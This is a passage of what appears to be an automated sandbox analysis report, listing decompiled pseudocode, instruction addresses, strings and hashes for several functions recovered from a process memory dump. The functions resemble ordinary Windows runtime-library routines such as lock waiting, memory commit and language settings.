						if( *0x46d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E045FFF60( *0x46d7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0461fab0
0x0461fab2
0x0461fab3
0x0461fab4
0x0461fabc
0x0461fac0
0x0461fb14
0x0461fb17
0x0461fac2
0x0461fac8
0x0461facd
0x0461fad3
0x0461fad3
0x0461fadd
0x0461fb18
0x0461fb1b
0x0461fb1d
0x0461fb1e
0x0461fb1f
0x0461fb20
0x0461fb21
0x0461fb22
0x0461fb23
0x0461fb24
0x0461fb25
0x0461fb26
0x0461fb27
0x0461fb28
0x0461fb29
0x0461fb2a
0x0461fb2b
0x0461fb2c
0x0461fb2d
0x0461fb2e
0x0461fb2f
0x0461fb3a
0x0461fb3b
0x0461fb3e
0x0461fb41
0x0461fb44
0x0461fb47
0x0461fb4a
0x0461fb4d
0x0461fb53
0x0465bdcb
0x0465bdcb
0x0461fb59
0x0461fb5b
0x0461fb5b
0x0461fb5e
0x0465bdd5
0x0465bdd8
0x00000000
0x0465bdda
0x00000000
0x0465bdda
0x0461fb64
0x0461fb64
0x0461fb64
0x0461fb67
0x0461fb6e
0x0461fb70
0x0461fb72
0x00000000
0x0461fb78
0x0461fb7a
0x0461fb7a
0x0461fb7d
0x0461fb80
0x0465bddf
0x0465bde1
0x00000000
0x0465bde3
0x00000000
0x0465bde3
0x0461fb86
0x0461fb86
0x0461fb86
0x0461fb8b
0x0461fb90
0x0461fb92
0x0461fb94
0x0461fb9a
0x0461fb9b
0x0461fba1
0x0465bde8
0x0465bdeb
0x0465bded
0x0465beb5
0x0465beb5
0x0465bebb
0x0465bebd
0x0465bec3
0x0465bed2
0x0465bedd
0x0465bedd
0x0465beed
0x00000000
0x0465bdf3
0x0465bdfe
0x0465be06
0x0465be0b
0x0465be0d
0x0465be0f
0x0465be14
0x0465be19
0x0465be20
0x0465be25
0x0465be27
0x0465be35
0x0465be39
0x0465be46
0x0465be4f
0x0465be54
0x0465be56
0x0465bef8
0x0465bef8
0x00000000
0x0465be5c
0x0465be5c
0x0465be60
0x00000000
0x0465be66
0x0465be66
0x0465be7f
0x0465be84
0x0465be87
0x0465be89
0x0465be8b
0x0465be99
0x0465be9d
0x0465bea0
0x0465beac
0x0465beaf
0x0465beb1
0x0465beb3
0x0465beb3
0x00000000
0x0465bea2
0x0465bea2
0x00000000
0x0465bea2
0x0465be8d
0x0465be8d
0x0465be92
0x00000000
0x0465be92
0x0465be8b
0x0465be60
0x0465be3b
0x0465be3b
0x0465be3e
0x00000000
0x0465be40
0x0465be40
0x0465be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0465be44
0x0465be3e
0x0465be29
0x0465be29
0x00000000
0x0465be29
0x0465be27
0x00000000
0x0461fba7
0x0461fba7
0x0461fbab
0x0465bf02
0x0461fbb1
0x0461fbb1
0x0461fbb8
0x0461fbbd
0x0461fbbd
0x0461fbbf
0x0461fbbf
0x0461fbc5
0x0461fbcb
0x0461fbf8
0x0461fbf8
0x0461fbfa
0x00000000
0x0461fc00
0x0461fc00
0x0461fc03
0x00000000
0x0461fc09
0x0461fc09
0x0461fc0f
0x0461fc15
0x0461fc23
0x0461fc23
0x0461fc25
0x0461fc27
0x0461fc75
0x0461fc7c
0x0461fc84
0x00000000
0x0461fc29
0x0461fc29
0x0461fc2d
0x0461fc30
0x0465bf0f
0x00000000
0x0461fc36
0x0461fc38
0x0461fc3b
0x0461fc41
0x0465bf17
0x0465bf19
0x0465bf48
0x0465bf4b
0x00000000
0x0465bf1b
0x0465bf22
0x0465bf24
0x0465bf26
0x00000000
0x0465bf2c
0x0465bf37
0x0465bf39
0x0465bf3b
0x00000000
0x0465bf41
0x0465bf41
0x0465bf41
0x0465bf41
0x0465bf45
0x00000000
0x0465bf45
0x0465bf3b
0x0465bf26
0x00000000
0x0461fc47
0x0461fc47
0x0461fc49
0x0461fcb2
0x0461fcb4
0x0461fcb6
0x0461fcdc
0x0461fcdc
0x00000000
0x0461fcb8
0x0461fcc3
0x0461fcc5
0x0461fcc7
0x00000000
0x0461fcc9
0x0461fcc9
0x0461fccd
0x00000000
0x0461fccd
0x0461fcc7
0x00000000
0x0461fc4b
0x0461fc4b
0x0461fc4e
0x0461fc4e
0x0461fc51
0x0461fc51
0x0461fc54
0x0461fc5a
0x0461fc5c
0x0461fc5f
0x0461fc61
0x0461fc63
0x0461fc65
0x0461fc67
0x0461fc6e
0x0461fc72
0x0461fc72
0x0461fc72
0x0461fc72
0x0461fc67
0x0461fc61
0x00000000
0x0461fc5a
0x0461fc49
0x0461fc41
0x0461fc30
0x0461fc27
0x0461fc03
0x0461fbcd
0x0461fbd3
0x0461fbd9
0x0461fbdc
0x0461fbde
0x0461fc99
0x0461fc9b
0x0461fc9d
0x0461fcd5
0x0461fcd5
0x0461fc89
0x0461fc89
0x00000000
0x0461fc9f
0x0461fc9f
0x0461fca3
0x00000000
0x0461fca3
0x00000000
0x0461fbe4
0x0461fbe4
0x0461fbe4
0x0461fbe4
0x0461fbe9
0x0461fbf2
0x00000000
0x0461fbf2
0x0461fbde
0x0461fbcb
0x0461fbab
0x0461fc8b
0x0461fc8b
0x0461fc8c
0x0461fb80
0x0461fb72
0x0461fb5e
0x0461fc8d
0x0461fc91
0x0461fadf
0x0461fadf
0x0461fae1
0x0461fae4
0x0461fae7
0x0461faec
0x0461faf8
0x0461fb00
0x0461fb07
0x0461fb0f
0x0461fb0f
0x0461fb07
0x00000000
0x0461faf8
0x0461fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0465BE0F

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 1ade45a3bf3a5076eea61347995560085100f9edfffa67f9283123637682774c
Instruction ID: 69dcf550cc374343e42b4f9f0c969d1f546a99753a9b9231ab78f2605168685e
Opcode Fuzzy Hash: 1ade45a3bf3a5076eea61347995560085100f9edfffa67f9283123637682774c
Instruction Fuzzy Hash: 20A1E471B006468BEB29DF64C450B7AB3A5BF58B14F08456ED946DB7A0FB34F841AB80

Uniqueness

Uniqueness Score: -1.00%

Function 045E2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E045E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x46d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x46d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E046297C0();
				}
				if( *0x46d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x46d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04611624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04607D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0467FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04629520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0461E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0463DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x46d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x46d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04629980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E046295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04607D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04607D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04667016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0467FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x46d5350;
							if(_t109 != 0x46d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0467FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04675720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x045e2d8a
0x045e2d8a
0x045e2d92
0x045e2d96
0x045e2d9e
0x045e2da0
0x045e2da3
0x045e2da5
0x045e2da8
0x045e2dab
0x045e2db2
0x0463f9aa
0x0463f9ab
0x0463f9ae
0x0463f9ae
0x045e2db8
0x045e2dc2
0x0463f9b9
0x0463f9be
0x0463f9bf
0x0463f9bf
0x045e2dcf
0x0463f9c9
0x045e2dd5
0x045e2dd5
0x045e2dd5
0x045e2dde
0x045e2de1
0x045e2e70
0x045e2e72
0x045e2e72
0x045e2de7
0x045e2deb
0x045e2e7c
0x045e2e83
0x045e2e85
0x045e2e8b
0x045e2e8d
0x045e2e92
0x045e2e92
0x045e2e85
0x045e2df1
0x045e2df7
0x045e2df9
0x045e2df9
0x045e2dfc
0x045e2dff
0x045e2e02
0x00000000
0x045e2e05
0x045e2e0c
0x0463f9d9
0x045e2e12
0x045e2e12
0x045e2e12
0x045e2e1a
0x0463f9e3
0x0463f9e9
0x0463f9f0
0x0463f9f6
0x0463f9f8
0x0463f9f8
0x0463f9f0
0x045e2e23
0x0463fa02
0x0463fa03
0x0463fa05
0x0463fa06
0x00000000
0x045e2e29
0x045e2e29
0x045e2e2e
0x045e2e34
0x045e2e3e
0x00000000
0x00000000
0x045e2e44
0x045e2e47
0x045e2e4d
0x00000000
0x00000000
0x045e2e4f
0x045e2e54
0x00000000
0x00000000
0x045e2e5a
0x045e2e5f
0x045e2e9a
0x045e2ea4
0x045e2ea5
0x045e2ea8
0x045e2eaf
0x045e2eb2
0x045e2eb5
0x0463fae9
0x0463faeb
0x0463faed
0x0463faef
0x0463faf7
0x0463faf8
0x0463fafd
0x0463faff
0x0463fb04
0x0463fb04
0x0463faff
0x045e2ec0
0x045e2ec4
0x045e2ec6
0x045e2ec8
0x0463fb14
0x0463fb18
0x0463fb1e
0x0463fb21
0x0463fb21
0x045e2ece
0x045e2ece
0x045e2ece
0x045e2ed7
0x045e2e61
0x045e2e63
0x0463fa6b
0x0463fa71
0x0463fa76
0x0463fa78
0x0463fa8a
0x0463fa7a
0x0463fa83
0x0463fa83
0x0463fa8f
0x0463fa91
0x0463fa97
0x0463fa9d
0x0463faa4
0x0463faaa
0x0463faaf
0x0463fab1
0x0463fac3
0x0463fab3
0x0463fabc
0x0463fabc
0x0463fac8
0x0463facb
0x0463fadf
0x0463fadf
0x0463facb
0x0463faa4
0x0463fa91
0x045e2e6f
0x045e2e6f
0x045e2e5f
0x0463fa13
0x0463fa15
0x0463fa17
0x0463fa1f
0x0463fa21
0x0463fa22
0x0463fa25
0x0463fa28
0x0463fa2f
0x0463fa2f
0x0463fa2a
0x0463fa2a
0x0463fa2a
0x0463fa31
0x0463fa34
0x0463fa36
0x0463fa3c
0x0463fa3e
0x0463fa41
0x0463fa43
0x0463fa45
0x0463fa45
0x0463fa41
0x0463fa3c
0x0463fa4a
0x0463fa4f
0x0463fa51
0x0463fa53
0x0463fa56
0x0463fa5b
0x0463fa5e
0x00000000
0x0463fa5e
0x045e2e23

Strings

RTL: Re-Waiting, xrefs: 0463FA4A

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 69b1d2e9e977fbd8ff4a38e400d03a34bacf22eb5541ef30e0aca92163e11c17
Instruction ID: f1a3610d555c1ee2f6302fb6dcd072bfea63f82372b8c2a455ba49dc4975e3ef
Opcode Fuzzy Hash: 69b1d2e9e977fbd8ff4a38e400d03a34bacf22eb5541ef30e0aca92163e11c17
Instruction Fuzzy Hash: 97611131F00694EBEB29DF69C880B7E77A9FB44319F1446AAE811973C0E734B901A781

Uniqueness

Uniqueness Score: -1.00%

Function 046B0EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E046B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E046AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E046B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04629730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E046AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E046AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x46d8b04 >> 0x14) + (_v44 -  *0x46d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04607D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E046A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04607D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0469FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x46d8724 & 0x00000008) != 0) {
						E046A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E046B15B5(0x46d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x046b0eb7
0x046b0eb9
0x046b0ec0
0x046b0ec2
0x046b0ecd
0x046b105b
0x046b105b
0x046b1061
0x046b1066
0x046b1066
0x046b106b
0x046b1073
0x046b1073
0x046b0ed3
0x046b0ed6
0x046b0edc
0x046b0ee0
0x046b0ee7
0x046b0ef0
0x046b0ef5
0x046b0efa
0x046b0efc
0x046b0efd
0x046b0f03
0x046b0f04
0x046b0f06
0x046b0f07
0x046b0f09
0x046b0f0e
0x046b0f14
0x046b0f23
0x046b0f2d
0x046b0f34
0x046b0f34
0x046b0f14
0x046b0f52
0x00000000
0x00000000
0x046b0f58
0x046b0f73
0x046b0f74
0x046b0f79
0x046b0f7d
0x046b0f80
0x046b0f86
0x046b0fab
0x046b0fb5
0x046b0fc6
0x046b0fd1
0x046b0fe3
0x046b0fd3
0x046b0fdc
0x046b0fdc
0x046b0feb
0x046b1009
0x046b1009
0x046b1015
0x046b1027
0x046b1017
0x046b1020
0x046b1020
0x046b102f
0x046b103c
0x046b103c
0x046b1048
0x046b1050
0x046b1050
0x046b1055
0x00000000
0x046b1055
0x046b0f88
0x046b0f9e
0x046b0fa2
0x046b0fa9
0x00000000
0x00000000
0x00000000
0x046b0fa9
0x00000000

Strings

`, xrefs: 046B0F16

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 78080b8c6e823aece81eb44403959d98d9f1dd3d9c62481bafb1e00a906e57ff
Instruction ID: 20d6b2ebd948ad0adfa03b97c095190085c98f5d54c9cea156915be6c9cdb028
Opcode Fuzzy Hash: 78080b8c6e823aece81eb44403959d98d9f1dd3d9c62481bafb1e00a906e57ff
Instruction Fuzzy Hash: 9651B070304741AFE324DF28D894B9BB7E9EBC5344F04492DF99687290EA70F845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0461F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0461F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04604120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04629830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04629990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E046295D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xa02bc81a
							_t109 = L04604620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000a02b
								E0462F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000a02b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E046295D0();
										L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0461f0d3
0x0461f0d9
0x0461f0e0
0x0461f0e7
0x0461f0f2
0x0461f0f4
0x0461f0f8
0x0461f100
0x0461f108
0x0461f10d
0x0461f115
0x0461f116
0x0461f11f
0x0461f123
0x0461f124
0x0461f12c
0x0461f130
0x0461f134
0x0461f13d
0x0461f144
0x0461f14b
0x0461f152
0x0465bab0
0x0465bab0
0x0461f158
0x0461f158
0x0461f15a
0x0461f160
0x0461f165
0x0461f166
0x0461f16f
0x0461f173
0x0465baa7
0x0465baa7
0x0465baab
0x00000000
0x0461f179
0x0461f179
0x0461f18d
0x0461f191
0x0465baa2
0x00000000
0x0461f197
0x0461f19b
0x0461f1a2
0x0461f1a9
0x0461f1af
0x0461f1b2
0x0461f1b6
0x0461f1b9
0x0461f1c0
0x0461f1c4
0x0461f1d8
0x0461f1df
0x0461f1e3
0x0461f1e6
0x0461f1eb
0x0461f1ee
0x0461f1f4
0x0461f20f
0x0465bab7
0x0465babb
0x0465bacc
0x0465bad1
0x0461f215
0x0461f218
0x0461f226
0x0461f22b
0x00000000
0x0461f22b
0x0461f1f6
0x0461f1f6
0x0461f1f9
0x0461f1fb
0x0461f1fb
0x0461f1f4
0x0461f191
0x0461f173
0x0461f152
0x0461f203

Strings

@, xrefs: 0461F124

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: d1eba89b73ee6a37bfe428d25b327e068cf7026bec20b017def776851e4f4e88
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: BD517A71600710AFD324DF28C840A6BBBF8FF88B14F00892DF995976A0E7B4E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04663540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04663540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x46dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04620BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04663706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0462FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04663540;
						E0462FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0463DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04670C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E046297C0();
					}
					return E0462B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04663971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04663884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0462FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04629650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04663787(_a4,  &_v352, _t80);
						}
					}
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E046295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04663552
0x0466355a
0x0466355d
0x04663566
0x04663567
0x0466357e
0x0466358f
0x046635a1
